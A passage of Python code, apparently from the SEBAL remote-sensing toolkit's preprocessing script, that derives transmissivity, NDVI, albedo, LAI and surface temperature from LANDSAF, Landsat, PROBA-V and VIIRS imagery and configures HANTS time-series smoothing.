Rs_inst_3Km[Rs_inst_3Km<0]=np.nan
# Get shape LANDSAF data
shape_trans=[dest_Rs_inst_3Km.RasterXSize , dest_Rs_inst_3Km.RasterYSize ]
# Calculate Transmissivity 3Km
Transmissivity_3Km = Rs_inst_3Km/Ra_inst_3Km
Transmissivity_3Km_fileName = os.path.join(output_folder_temp,'Transmissivity_3Km.tif')
SEBAL.save_GeoTiff_proy(Ra_inst_3Km_dest, Transmissivity_3Km, Transmissivity_3Km_fileName, shape_trans, nband=1)
# Reproject Transmissivity to match DEM (now this is done by using the nearest neighbour method)
Transmissivity_inst_dest, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(Transmissivity_3Km_fileName, cos_zn_fileName, method = 3)
Transmissivity_inst = Transmissivity_inst_dest.GetRasterBand(1).ReadAsArray()
Transmissivity_inst[Transmissivity_inst>0.98] = 0.98
Transmissivity_inst_fileName = os.path.join(TRANS_outfolder,'Transmissivity_inst_%s.tif' %Var_name)
SEBAL.save_GeoTiff_proy(Transmissivity_inst_dest, Transmissivity_inst, Transmissivity_inst_fileName, shape, nband=1)
'''
# Extract the method radiation value
Value_Method_Radiation_24 = '%s' %str(ws['I%d' % number].value)
# Extract the data for the radiation method
if int(Value_Method_Radiation_24) == 2:
Field_Radiation_24 = '%s' %str(ws['K%d' % number].value)
if Field_Radiation_24 == 'None':
# Daily Transmissivity files must be created
Check_Trans_24 = 1
# Create times that are needed to calculate daily Rs (LANDSAF)
Starttime_GMT = datetime.strptime(Startdate,'%Y-%m-%d') + timedelta(hours=-delta_GTM)
Endtime_GMT = Starttime_GMT + timedelta(days=1)
Times = pd.date_range(Starttime_GMT, Endtime_GMT,freq = '30min')
for Time in Times[:-1]:
year_LANDSAF = Time.year
month_LANDSAF = Time.month
day_LANDSAF = Time.day
hour_LANDSAF = Time.hour
min_LANDSAF = Time.minute
# Define the instantaneous LANDSAF file
#re = glob.glob('')
name_Landsaf_inst = 'HDF5_LSASAF_MSG_DSSF_MSG-Disk_%d%02d%02d%02d%02d.tif' %(year_LANDSAF, month_LANDSAF,day_LANDSAF, hour_LANDSAF, min_LANDSAF)
file_Landsaf_inst = os.path.join(DSSF_Folder,name_Landsaf_inst)
# Open the Rs LANDSAF data
dest_Rs_inst_3Km = gdal.Open(file_Landsaf_inst)
Rs_one_3Km = dest_Rs_inst_3Km.GetRasterBand(1).ReadAsArray()
Rs_one_3Km = np.float_(Rs_one_3Km)/10
Rs_one_3Km[Rs_one_3Km < 0]=np.nan
if Time == Times[0]:
Rs_24_3Km_tot = Rs_one_3Km
else:
Rs_24_3Km_tot += Rs_one_3Km
Rs_24_3Km = Rs_24_3Km_tot / len(Times[:-1])
# Reproject the Ra_inst data to match the LANDSAF data
Ra_24_3Km_dest, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(Ra_mountain_24_fileName, file_Landsaf_inst, method = 3)
Ra_24_3Km = Ra_24_3Km_dest.GetRasterBand(1).ReadAsArray()
Ra_24_3Km[Ra_24_3Km==0] = np.nan
# Do gapfilling
Ra_24_3Km = gap_filling(Ra_24_3Km,np.nan)
# Get shape LANDSAF data
shape_trans=[dest_Rs_inst_3Km.RasterXSize , dest_Rs_inst_3Km.RasterYSize ]
# Calculate Transmissivity 3Km
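# (Transmissivity here is the ratio of the measured daily surface shortwave
# radiation from LANDSAF (Rs) to the computed daily extraterrestrial
# radiation (Ra); values are capped at 0.98 further below.)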
Transmissivity_24_3Km = Rs_24_3Km/Ra_24_3Km
Transmissivity_24_3Km_fileName = os.path.join(temp_folder_PreSEBAL,'Transmissivity_24_3Km.tif')
SEBAL.save_GeoTiff_proy(Ra_24_3Km_dest, Transmissivity_24_3Km, Transmissivity_24_3Km_fileName, shape_trans, nband=1)
# Reproject Transmissivity to match DEM (now this is done by using the nearest neighbour method)
Transmissivity_24_dest, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(Transmissivity_24_3Km_fileName, lon_fileName, method = 3)
Transmissivity_24 = Transmissivity_24_dest.GetRasterBand(1).ReadAsArray()
Transmissivity_24[Transmissivity_24>0.98] = 0.98
Transmissivity_24_fileName = os.path.join(TRANS_outfolder,'Transmissivity_24_%s.tif' %Var_name)
SEBAL.save_GeoTiff_proy(Transmissivity_24_dest, Transmissivity_24, Transmissivity_24_fileName, shape, nband=1)
#################### Calculate NDVI for LANDSAT ##########################################
if Image_Type == 1:
# Define bands used for each Landsat number
if Landsat_nr == 5 or Landsat_nr == 7:
Bands = np.array([1, 2, 3, 4, 5, 7, 6])
elif Landsat_nr == 8:
Bands = np.array([2, 3, 4, 5, 6, 7, 10, 11])
else:
print('Landsat image not supported, use Landsat 5, 7 or 8')
# Open MTL landsat and get the correction parameters
Landsat_meta_fileName = os.path.join(input_folder, '%s_MTL.txt' % Name_Landsat_Image)
Lmin, Lmax, k1_c, k2_c = SEBAL.info_band_metadata(Landsat_meta_fileName, Bands)
# Mean solar exo-atmospheric irradiance for each band (W/m2/microm)
# for the different Landsat images (L5, L7, or L8)
ESUN_L5 = np.array([1983, 1796, 1536, 1031, 220, 83.44])
ESUN_L7 = np.array([1997, 1812, 1533, 1039, 230.8, 84.9])
ESUN_L8 = np.array([1973.28, 1842.68, 1565.17, 963.69, 245, 82.106])
# Open one band - to get the metadata of the landsat images only once (to get the extent)
src_FileName = os.path.join(input_folder, '%s_B2.TIF' % Name_Landsat_Image) # before 10!
ls,band_data,ulx,uly,lrx,lry,x_size_ls,y_size_ls = SEBAL.Get_Extend_Landsat(src_FileName)
# Crop the Landsat images to the DEM extent -
dst_FileName = os.path.join(temp_folder_PreSEBAL,'cropped_LS_b2.tif') # Before 10 !!
# Clip the landsat image to match the DEM map
lsc, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(src_FileName, lon_fileName)
data_LS = lsc.GetRasterBand(1).ReadAsArray()
SEBAL.save_GeoTiff_proy(dest, data_LS, dst_FileName, shape, nband=1)
# Get the extent of the remaining landsat file after clipping based on the DEM file
lsc,band_data,ulx,uly,lrx,lry,x_size_lsc,y_size_lsc = SEBAL.Get_Extend_Landsat(dst_FileName)
# Create the corrected signals of Landsat in 1 array
Reflect = SEBAL.Landsat_Reflect(Bands,input_folder,Name_Landsat_Image,output_folder,shape,Lmax,Lmin,ESUN_L5,ESUN_L7,ESUN_L8,cos_zn_resh,dr,Landsat_nr, cos_zn_fileName)
# Calculate temporal water mask
water_mask_temp=SEBAL.Water_Mask(shape,Reflect)
# Calculate NDVI
NDVI = SEBAL.Calc_NDVI(Reflect)
# Calculate albedo
albedo = SEBAL.Calc_albedo(Reflect)
# Save NDVI
NDVI_FileName = os.path.join(NDVI_outfolder,'NDVI_LS_%s.tif'%Var_name)
SEBAL.save_GeoTiff_proy(dest, NDVI, NDVI_FileName, shape, nband=1)
# Save albedo
albedo_FileName = os.path.join(Albedo_outfolder,'Albedo_LS_%s.tif'%Var_name)
SEBAL.save_GeoTiff_proy(dest, albedo, albedo_FileName, shape, nband=1)
################### Extract Meteo data for Landsat days from SEBAL Excel ##################
# Open the Meteo_Input sheet
ws = wb['Meteo_Input']
# ---------------------------- Instantaneous Air Temperature ------------
# Open meteo data, first try to open as value, otherwise as string (path)
try:
Temp_inst = float(ws['B%d' %number].value) # Instantaneous Air Temperature (°C)
# if the data is not a value, then open it as a string (path)
except:
Temp_inst_name = '%s' %str(ws['B%d' %number].value)
Temp_inst_fileName = os.path.join(temp_folder_PreSEBAL, 'Temp_inst_input.tif')
Temp_inst = SEBAL.Reshape_Reproject_Input_data(Temp_inst_name, Temp_inst_fileName, lon_fileName)
try:
RH_inst = float(ws['D%d' %number].value) # Instantaneous Relative humidity (%)
# if the data is not a value, then open it as a string (path)
except:
RH_inst_name = '%s' %str(ws['D%d' %number].value)
RH_inst_fileName = os.path.join(temp_folder_PreSEBAL, 'RH_inst_input.tif')
RH_inst = SEBAL.Reshape_Reproject_Input_data(RH_inst_name, RH_inst_fileName, lon_fileName)
esat_inst = 0.6108 * np.exp(17.27 * Temp_inst / (Temp_inst + 237.3))
eact_inst = RH_inst * esat_inst / 100
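# Worked example (illustrative): at Temp_inst = 30 degrees C,
# esat_inst = 0.6108 * exp(17.27 * 30 / 267.3) ~= 4.24 kPa, and with
# RH_inst = 50 % the actual vapour pressure eact_inst ~= 2.12 kPa.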
#################### Calculate NDVI for VIIRS-PROBAV ##########################################
if Image_Type == 2:
if Name_PROBAV_Image == 'None':
offset_all = [-1, 1, -2, 2, -3, 3, -4, 4, -5, 5, -6, 6, -7, 7, -8, 8]
found_Name_PROBAV_Image = 0
for offset in offset_all:
if found_Name_PROBAV_Image == 1:
continue
else:
try:
Name_PROBAV_Image = SEBAL_RUNS[number + offset]['PROBA_V_name']
if not Name_PROBAV_Image == 'None':
found_Name_PROBAV_Image = 1
except:
pass
# Get the day and time from the PROBA-V
Band_PROBAVhdf_fileName = os.path.join(input_folder, '%s.HDF5' % (Name_PROBAV_Image))
g=gdal.Open(Band_PROBAVhdf_fileName, gdal.GA_ReadOnly)
Meta_data = g.GetMetadata()
Date_PROBAV = str(Meta_data['LEVEL3_RADIOMETRY_BLUE_OBSERVATION_START_DATE'])
year = int(Date_PROBAV.split("-")[0])
month = int(Date_PROBAV.split("-")[1])
day = int(Date_PROBAV.split("-")[2])
Var_name_2 = '%d%02d%02d' %(year, month, day)
# Define the output name
NDVI_FileName = os.path.join(NDVI_outfolder,'NDVI_PROBAV_%s.tif' %Var_name_2)
Albedo_FileName = os.path.join(Albedo_outfolder, 'Albedo_PROBAV_%s.tif' %Var_name_2)
water_mask_temp_FileName = os.path.join(WaterMask_outfolder, 'Water_Mask_PROBAV_%s.tif' %Var_name_2)
else:
NDVI_FileName = os.path.join(NDVI_outfolder,'NDVI_PROBAV_%s.tif' %Var_name)
Albedo_FileName = os.path.join(Albedo_outfolder, 'Albedo_PROBAV_%s.tif' %Var_name)
water_mask_temp_FileName = os.path.join(WaterMask_outfolder, 'Water_Mask_PROBAV_%s.tif' %Var_name)
# vegetation maps that will be generated
if not os.path.exists(NDVI_FileName):
# Define the bands that will be used
bands=['SM', 'B1', 'B2', 'B3', 'B4'] #'SM', 'BLUE', 'RED', 'NIR', 'SWIR'
# Set the index number at 0
index=0
# create a zero array with the shape of the reprojected DEM file
data_PROBAV=np.zeros((shape[1], shape[0]))
spectral_reflectance_PROBAV=np.zeros([shape[1], shape[0], 5])
# constants
n188_float = 248 # Now it is 248, but we do not know exactly what this means, nor whether this constant holds for all images.
# write the data one by one to the spectral_reflectance_PROBAV
for bandnmr in bands:
# Translate the PROBA-V names to the Landsat band names
Band_number = {'SM':7,'B1':8,'B2':10,'B3':9,'B4':11}
# Open the dataset
Band_PROBAVhdf_fileName = os.path.join(input_folder, '%s.HDF5' % (Name_PROBAV_Image))
g=gdal.Open(Band_PROBAVhdf_fileName, gdal.GA_ReadOnly)
# define data if it is not there yet
if 'Var_name' not in locals():
Meta_data = g.GetMetadata()
Date_PROBAV = str(Meta_data['LEVEL3_RADIOMETRY_BLUE_OBSERVATION_START_DATE'])
year = int(Date_PROBAV.split("-")[0])
month = int(Date_PROBAV.split("-")[1])
day = int(Date_PROBAV.split("-")[2])
Var_name = '%d%02d%02d' %(year, month, day)
# Open the .hdf file
name_out = os.path.join(input_folder, '%s_test.tif' % (Name_PROBAV_Image))
name_in = g.GetSubDatasets()[Band_number[bandnmr]][0]
# Get environmental variable
SEBAL_env_paths = os.environ["SEBAL"].split(';')
GDAL_env_path = SEBAL_env_paths[0]
GDAL_TRANSLATE = os.path.join(GDAL_env_path, 'gdal_translate.exe')
# run gdal translate command
FullCmd = '%s -of GTiff %s %s' %(GDAL_TRANSLATE, name_in, name_out)
SEBAL.Run_command_window(FullCmd)
# Open data
dest_PV = gdal.Open(name_out)
Data = dest_PV.GetRasterBand(1).ReadAsArray()
dest_PV = None
# Remove temporary file
os.remove(name_out)
# Define the x and y spacing
Meta_data = g.GetMetadata()
Lat_Bottom = float(Meta_data['LEVEL3_GEOMETRY_BOTTOM_LEFT_LATITUDE'])
Lat_Top = float(Meta_data['LEVEL3_GEOMETRY_TOP_RIGHT_LATITUDE'])
Lon_Left = float(Meta_data['LEVEL3_GEOMETRY_BOTTOM_LEFT_LONGITUDE'])
Lon_Right = float(Meta_data['LEVEL3_GEOMETRY_TOP_RIGHT_LONGITUDE'])
Pixel_size = float((Meta_data['LEVEL3_GEOMETRY_VNIR_VAA_MAPPING']).split(' ')[-3])
# Define the georeference of the PROBA-V data
geo_PROBAV=[Lon_Left-0.5*Pixel_size, Pixel_size, 0, Lat_Top+0.5*Pixel_size, 0, -Pixel_size] #0.000992063492063
# Define the name of the output file
PROBAV_data_name=os.path.join(input_folder, '%s_%s.tif' % (Name_PROBAV_Image,bandnmr))
dst_fileName=os.path.join(input_folder, PROBAV_data_name)
# create gtiff output with the PROBA-V band
fmt = 'GTiff'
driver = gdal.GetDriverByName(fmt)
dst_dataset = driver.Create(dst_fileName, int(Data.shape[1]), int(Data.shape[0]), 1,gdal.GDT_Float32)
dst_dataset.SetGeoTransform(geo_PROBAV)
# set the reference info
srs = osr.SpatialReference()
srs.SetWellKnownGeogCS("WGS84")
dst_dataset.SetProjection(srs.ExportToWkt())
# write the array in the geotiff band
dst_dataset.GetRasterBand(1).WriteArray(Data)
dst_dataset = None
# Open the PROBA-V band in SEBAL
g=gdal.Open(PROBAV_data_name.replace("\\","/"))
# If the data cannot be opened, change the extension
if g is None:
PROBAV_data_name=os.path.join(input_folder, '%s_%s.tiff' % (Name_PROBAV_Image,bandnmr))
# Reproject the PROBA-V band to match DEM's resolution
PROBAV, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(
PROBAV_data_name, lon_fileName)
# Open the reprojected PROBA-V band data
data_PROBAV_DN = PROBAV.GetRasterBand(1).ReadAsArray(0, 0, ncol, nrow)
# Define the filename to store the cropped PROBA-V image
dst_FileName = os.path.join(output_folder, 'Output_PROBAV','proy_PROBAV_%s.tif' % bandnmr)
# close the PROBA-V
g=None
# If the band data is not SM, change the DN values into PROBA-V values and write into the spectral_reflectance_PROBAV
if bandnmr != 'SM':
data_PROBAV[:, :]=data_PROBAV_DN/2000
spectral_reflectance_PROBAV[:, :, index]=data_PROBAV[:, :]
# If the band data is the SM band, then write the data into the spectral_reflectance_PROBAV and create the cloud mask
else:
data_PROBAV[:, :]=data_PROBAV_DN
Cloud_Mask_PROBAV=np.zeros((shape[1], shape[0]))
Cloud_Mask_PROBAV[data_PROBAV[:,:]!=n188_float]=1
spectral_reflectance_PROBAV[:, :, index]=Cloud_Mask_PROBAV
# Change the spectral reflectance to meet certain limits
spectral_reflectance_PROBAV[:, :, index]=np.where(spectral_reflectance_PROBAV[:, :, index]<=0,np.nan,spectral_reflectance_PROBAV[:, :, index])
spectral_reflectance_PROBAV[:, :, index]=np.where(spectral_reflectance_PROBAV[:, :, index]>=150,np.nan,spectral_reflectance_PROBAV[:, :, index])
# Go to the next index
index=index+1
# Bands in PROBAV spectral reflectance
# 0 = SM
# 1 = BLUE
# 2 = RED
# 3 = NIR
# 4 = SWIR
# Calculate surface albedo based on PROBA-V
Surface_Albedo_PROBAV = 0.219 * spectral_reflectance_PROBAV[:, :, 1] + 0.361 * spectral_reflectance_PROBAV[:, :, 2] + 0.379 * spectral_reflectance_PROBAV[:, :, 3] + 0.041 * spectral_reflectance_PROBAV[:, :, 4]
# Calculate the NDVI based on PROBA-V
n218_memory = spectral_reflectance_PROBAV[:, :, 2] + spectral_reflectance_PROBAV[:, :, 3]
NDVI = np.zeros((shape[1], shape[0]))
NDVI[n218_memory != 0] = ( spectral_reflectance_PROBAV[:, :, 3][n218_memory != 0] - spectral_reflectance_PROBAV[:, :, 2][n218_memory != 0] )/ ( spectral_reflectance_PROBAV[:, :, 2][n218_memory != 0] + spectral_reflectance_PROBAV[:, :, 3][n218_memory != 0] )
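# Worked example (illustrative): for a vegetated pixel with RED = 0.08 and
# NIR = 0.40, NDVI = (0.40 - 0.08) / (0.40 + 0.08) ~= 0.67; bare soil and
# water give values near or below zero.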
# Create Water mask based on PROBA-V
water_mask_temp = np.zeros((shape[1], shape[0]))
water_mask_temp[np.logical_and(np.logical_and(NDVI<0.1,data_DEM>0),Surface_Albedo_PROBAV<0.2)]=1
# Save Albedo for PROBA-V
SEBAL.save_GeoTiff_proy(dest, Surface_Albedo_PROBAV, Albedo_FileName, shape, nband=1)
# Save NDVI for PROBA-V
SEBAL.save_GeoTiff_proy(dest, NDVI, NDVI_FileName, shape, nband=1)
# Save Water Mask for PROBA-V
SEBAL.save_GeoTiff_proy(dest, water_mask_temp, water_mask_temp_FileName, shape, nband=1)
else:
dest_NDVI = gdal.Open(NDVI_FileName)
dest_water_mask_temp = gdal.Open(water_mask_temp_FileName)
NDVI = dest_NDVI.GetRasterBand(1).ReadAsArray()
water_mask_temp = dest_water_mask_temp.GetRasterBand(1).ReadAsArray()
############################ Calculate LAI ##########################################
# Calculate the LAI
FPAR,tir_emis,Nitrogen,vegt_cover,LAI,b10_emissivity = SEBAL.Calc_vegt_para(NDVI,water_mask_temp,shape)
# Create LAI name
if Image_Type == 1:
LAI_FileName = os.path.join(LAI_outfolder,'LAI_LS_%s.tif' %Var_name)
SEBAL.save_GeoTiff_proy(dest, LAI, LAI_FileName, shape, nband=1)
#################### Calculate thermal for Landsat ##########################################
if Image_Type == 1:
# Calculate thermal
therm_data = SEBAL.Landsat_therm_data(Bands,input_folder,Name_Landsat_Image,output_folder,ulx_dem,lry_dem,lrx_dem,uly_dem,shape)
# Calculate surface temperature
Surface_temp=SEBAL.Calc_surface_water_temp(Temp_inst,Landsat_nr,Lmax,Lmin,therm_data,b10_emissivity,k1_c,k2_c,eact_inst,shape,water_mask_temp,Bands_thermal,Rp,tau_sky,surf_temp_offset,Image_Type)
# Save surface temperature
therm_data_FileName = os.path.join(Surface_Temperature_outfolder,'Surface_Temperature_LS_%s.tif' %Var_name)
SEBAL.save_GeoTiff_proy(dest, Surface_temp, therm_data_FileName, shape, nband=1)
################################## Calculate VIIRS surface temperature ########################
if Image_Type == 2:
# If there is VIIRS data
if not Name_VIIRS_Image_TB == 'None':
# Define the VIIRS thermal data name
VIIRS_data_name=os.path.join(input_folder, '%s' % (Name_VIIRS_Image_TB))
# Reproject VIIRS thermal data
VIIRS, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(VIIRS_data_name, lon_fileName)
# Open VIIRS thermal data
data_VIIRS = VIIRS.GetRasterBand(1).ReadAsArray()
# Set the conditions for the brightness temperature (100m)
brightness_temp=np.where(data_VIIRS>=250, data_VIIRS, np.nan)
# Constants
k1=606.399172
k2=1258.78
L_lambda_b10_100=((2*6.63e-34*(3.0e8)**2)/((11.45e-6)**5*(np.exp((6.63e-34*3e8)/(1.38e-23*(11.45e-6)*brightness_temp))-1)))*1e-6
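# The expression above evaluates Planck's law at 11.45e-6 m (the VIIRS I5
# band centre used here) to convert brightness temperature back to spectral
# radiance; the trailing 1e-6 converts the result to W/m2/sr/micrometre.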
# Get Temperature for 100 and 375m resolution
Temp_TOA_100 = SEBAL.Get_Thermal(L_lambda_b10_100,Rp,Temp_inst,tau_sky,tir_emis,k1,k2)
# Conditions for surface temperature (100m)
n120_surface_temp=Temp_TOA_100.clip(250, 450)
# Save the surface temperature of the VIIRS in 100m resolution
temp_surface_100_fileName_beforeTS = os.path.join(Surface_Temperature_outfolder,'Surface_Temperature_VIIRS_%s.tif' %Var_name)
SEBAL.save_GeoTiff_proy(dest, n120_surface_temp, temp_surface_100_fileName_beforeTS, shape, nband=1)
###################################################################################################################
################################################### HANTS part 4 ##################################################
###################################################################################################################
# Select the PROBA-V files that need to be used (sometimes a composite product is used)
PROBA_V_Dict = {}
for k, v in SEBAL_RUNS.iteritems():
if str(v['PROBA_V_name']) != 'None':
PROBA_V_Dict.setdefault(v['PROBA_V_name'], []).append(k)
Amount_Unique_PROBA_V_images = len(PROBA_V_Dict.keys())
Back_names = []
# Define HANTS PROBA-V variables
VARS = ["NDVI", "Albedo"]
for VAR in VARS:
output_folder_preprocessing_VAR = os.path.join(output_folder_PreSEBAL_SEBAL, VAR)
os.chdir(output_folder_preprocessing_VAR)
for PROBA_V_image in PROBA_V_Dict.keys():
Band_PROBAVhdf_fileName = os.path.join(input_folder_SEBAL, '%s.HDF5' % (PROBA_V_image))
g=gdal.Open(Band_PROBAVhdf_fileName, gdal.GA_ReadOnly)
Meta_data = g.GetMetadata()
Date_PROBAV = str(Meta_data['LEVEL3_RADIOMETRY_BLUE_OBSERVATION_START_DATE'])
year = int(Date_PROBAV.split("-")[0])
month = int(Date_PROBAV.split("-")[1])
day = int(Date_PROBAV.split("-")[2])
Back_name = '%s_PROBAV_%d%02d%02d.tif' %(VAR, year, month, day)
# Create the HANTS input for this variable
input_folder_HANTS_VAR = os.path.join(temp_folder_PreSEBAL, VAR)
if not os.path.exists(input_folder_HANTS_VAR):
os.mkdir(input_folder_HANTS_VAR)
shutil.copy(os.path.join(output_folder_preprocessing_VAR,Back_name),os.path.join(input_folder_HANTS_VAR,Back_name))
# VIIRS parameter copy
VIIRS_Dict = {}
for k, v in SEBAL_RUNS.iteritems():
if str(v['VIIRS_name']) != 'None':
VIIRS_Dict.setdefault(v['VIIRS_name'], []).append(k)
THERM = 'Surface_Temperature'
output_folder_preprocessing_THERM = os.path.join(output_folder_PreSEBAL_SEBAL, THERM)
for VIIRS_image in VIIRS_Dict.keys():
try:
Date_VIIRS = (VIIRS_image.split("d")[1])
year = int(Date_VIIRS.split("-")[0][0:4])
month = int(Date_VIIRS.split("-")[0][4:6])
day = int(Date_VIIRS.split("-")[0][6:8])
except:
Date_VIIRS = (VIIRS_image.split("_")[3])
year = int(Date_VIIRS.split("-")[0][0:4])
month = int(Date_VIIRS.split("-")[0][4:6])
day = int(Date_VIIRS.split("-")[0][6:8])
Back_name_TB = '%s_VIIRS_%d%02d%02d.tif' %(THERM, year, month, day)
# Create the HANTS input for the thermal data
input_folder_HANTS_THERM = os.path.join(temp_folder_PreSEBAL, THERM)
if not os.path.exists(input_folder_HANTS_THERM):
os.mkdir(input_folder_HANTS_THERM)
shutil.copy(os.path.join(output_folder_preprocessing_THERM,Back_name_TB),os.path.join(input_folder_HANTS_THERM,Back_name_TB))
############################################ Solve shift in PROBA-V ##############################################
VAR = 'Albedo'
os.chdir(os.path.join(temp_folder_PreSEBAL, VAR))
re = glob.glob('%s*.tif' %(VAR))
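# Shift detection (sketch of the logic below): for each later image, compare
# the pixel-wise correlation with the first image both as-is (Corr) and with
# one image shifted by a single row (Corr2). If the shifted alignment
# correlates better, the composite is assumed to be offset by one row and
# every HANTS input variable for that date is shifted accordingly.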
i = 0
while i < int(len(re)-1):
filename1 = re[0] # perhaps change this later so that index 0 is only used when its number of valid pixels is less than 40% of the total
filename2 = re[i + 1]
dest1 = gdal.Open(filename1)
dest2 = gdal.Open(filename2)
Array1 = dest1.GetRasterBand(1).ReadAsArray().flatten()
Array2 = dest2.GetRasterBand(1).ReadAsArray().flatten()
Array3 = dest1.GetRasterBand(1).ReadAsArray()[1:,:].flatten()
Array4 = dest2.GetRasterBand(1).ReadAsArray()[:-1,:].flatten()
Array1_flat = Array1[np.logical_and(~np.isnan(Array1),~np.isnan(Array2))]
Array2_flat = Array2[np.logical_and(~np.isnan(Array1),~np.isnan(Array2))]
Array3_flat = Array3[np.logical_and(~np.isnan(Array3),~np.isnan(Array4))]
Array4_flat = Array4[np.logical_and(~np.isnan(Array3),~np.isnan(Array4))]
Corr = np.corrcoef(Array1_flat,Array2_flat)[0,1]
Corr2 = np.corrcoef(Array3_flat,Array4_flat)[0,1]
if Corr2 > Corr:
x,y = dest1.GetRasterBand(1).ReadAsArray().shape
for VAR_check in VARS:
os.chdir(os.path.join(temp_folder_PreSEBAL, VAR_check))
endname = filename2.split('_')[-1]
re_vars = glob.glob('%s*_%s' %(VAR_check,endname))
filename3 = re_vars[0]
dest3 = gdal.Open(filename3)
New_Array = np.ones(dest1.GetRasterBand(1).ReadAsArray().shape) * np.nan
New_Array[1:,:] = dest3.GetRasterBand(1).ReadAsArray()[:-1,:]
filename_out = os.path.join(temp_folder_PreSEBAL, VAR_check, filename3)
SEBAL.save_GeoTiff_proy(dest3, New_Array, filename_out, [int(y),int(x)], nband=1)
i += 1
################################################### General HANTS ###############################################
# Open one image
PROBA_V_IMAGE = os.path.join(input_folder_HANTS_VAR,Back_name)
destPROBAV = gdal.Open(PROBA_V_IMAGE)
VIIRS_IMAGE = os.path.join(input_folder_HANTS_THERM,Back_name_TB)
destVIIRS = gdal.Open(VIIRS_IMAGE)
# Get Geotransform
Geo_PROBAV = destPROBAV.GetGeoTransform()
x_size_PROBAV = destPROBAV.RasterXSize
y_size_PROBAV = destPROBAV.RasterYSize
Geo_VIIRS = destVIIRS.GetGeoTransform()
x_size_VIIRS = destVIIRS.RasterXSize
y_size_VIIRS = destVIIRS.RasterYSize
# Get projection
proj = Get_epsg(destPROBAV)
projVIIRS = Get_epsg(destVIIRS)
# Data parameters
latlim = [Geo_PROBAV[3] + y_size_PROBAV * Geo_PROBAV[5],Geo_PROBAV[3]]
lonlim = [Geo_PROBAV[0], Geo_PROBAV[0] + x_size_PROBAV * Geo_PROBAV[1]]
cellsize = Geo_PROBAV[1]
latlimVIIRS = [Geo_VIIRS[3] + y_size_VIIRS * Geo_VIIRS[5], Geo_VIIRS[3]]
lonlimVIIRS = [Geo_VIIRS[0], Geo_VIIRS[0] + x_size_VIIRS * Geo_VIIRS[1]]
cellsizeVIIRS = Geo_VIIRS[1]
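# Worked example (illustrative): for a GDAL geotransform
# (lon_ul, dx, 0, lat_ul, 0, -dy) with lon_ul = 50.0, dx = 0.001 and 1000
# columns, lonlim = [50.0, 50.0 + 1000 * 0.001] = [50.0, 51.0]; latlim is
# built the same way from the (negative) row spacing.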
# Get the HANTS parameters
ws_para = wb_veg['HANTS_Input']
# number of images
Dates = pd.date_range(start_date, end_date, freq = 'D')
###################################################### HANTS Thermal ###############################################
# Define parameters for the surface temperature
THERM = 'Surface_Temperature'
# Define paths for the surface temperature
input_folder_HANTS_THERM = os.path.join(temp_folder_PreSEBAL, THERM)
name_format = '%s_VIIRS_{0}.tif' %THERM
nc_path_TB = os.path.join(input_folder_HANTS_THERM,'%s_NC.nc' %THERM)
# Create Output folder
rasters_path_out = os.path.join(temp_folder_PreSEBAL, THERM + "_HANTS")
if not os.path.exists(rasters_path_out):
os.mkdir(rasters_path_out)
# HANTS parameters for the surface temperature
nb = int(len(Dates))
Dates = pd.date_range(start_date, end_date, freq = 'D')
nf = int(ws_para['D2'].value) # number of frequencies to be considered above the zero frequency
low = float(ws_para['D3'].value) # valid range minimum
high = float(ws_para['D4'].value) # valid range maximum
HiLo = str(ws_para['D5'].value) # 2-character string indicating rejection of high or low outliers
fet = float(ws_para['D6'].value) # fit error tolerance (points deviating more than fet from the curve fit are rejected)
delta = float(ws_para['D7'].value) # small positive number, e.g. 0.1, to suppress high amplitudes
dod = float(ws_para['D8'].value) # degree of overdeterminedness (iteration stops if the number of points reaches the minimum required for curve fitting, plus dod). This is a safety measure
from SEBAL.hants import wa_gdal
# Run
wa_gdal.run_HANTS(input_folder_HANTS_THERM, name_format,
start_date, end_date, latlimVIIRS, lonlimVIIRS, cellsizeVIIRS, nc_path_TB,
nb, nf, HiLo, low, high, fet, dod, delta,
projVIIRS, -9999.0, rasters_path_out, export_hants_only=True)
###################################################### HANTS NDVI ###############################################
# Define parameters for the NDVI
VAR = 'NDVI'
# Define paths for NDVI
input_folder_HANTS_VAR = os.path.join(temp_folder_PreSEBAL, VAR)
name_format = '%s_PROBAV_{0}.tif' %VAR
nc_path_ndvi = os.path.join(input_folder_HANTS_VAR,'%s_NC.nc' %VAR)
# Create Output folder
rasters_path_out = os.path.join(temp_folder_PreSEBAL, VAR + "_HANTS")
if not os.path.exists(rasters_path_out):
os.mkdir(rasters_path_out)
# HANTS parameters for NDVI
nb = int(len(Dates)) # nr of images
nf = int(ws_para['C2'].value) # number of frequencies to be considered above the zero frequency
low = float(ws_para['C3'].value) # valid range minimum
high = float(ws_para['C4'].value) # valid range maximum
HiLo = str(ws_para['C5'].value) # 2-character string indicating rejection of high or low outliers
fet = float(ws_para['C6'].value) # fit error tolerance (points deviating more than fet from the curve fit are rejected)
delta = float(ws_para['C7'].value) # small positive number (e.g. 0.1) to suppress high amplitudes
dod = float(ws_para['C8'].value) # degree of overdeterminedness (iteration stops once the number of points reaches the minimum required for curve fitting, plus dod); this is a safety measure
from SEBAL.hants import wa_gdal
# Run
wa_gdal.run_HANTS(input_folder_HANTS_VAR, name_format,
start_date, end_date, latlim, lonlim, cellsize, nc_path_ndvi,
nb, nf, HiLo, low, high, fet, dod, delta,
proj, -9999.0, rasters_path_out, export_hants_only=True)
###################################################### HANTS Albedo ##############################################
# Define parameters for the albedo
VAR = 'Albedo'
# Define paths for albedo
input_folder_HANTS_VAR = os.path.join(temp_folder_PreSEBAL, VAR)
name_format = '%s_PROBAV_{0}.tif' %VAR
nc_path_albedo = os.path.join(input_folder_HANTS_VAR,'%s_NC.nc' %VAR)
# Create Output folder
rasters_path_out = os.path.join(temp_folder_PreSEBAL, VAR + "_HANTS")
if not os.path.exists(rasters_path_out):
os.mkdir(rasters_path_out)
# HANTS parameters for albedo
Dates = pd.date_range(start_date, end_date, freq = 'D')
nb = int(len(Dates)) # nr of images
nf = int(ws_para['B2'].value) # number of frequencies to be considered above the zero frequency
low = float(ws_para['B3'].value) # valid range minimum
high = float(ws_para['B4'].value) # valid range maximum
HiLo = str(ws_para['B5'].value) # 2-character string indicating rejection of high or low outliers
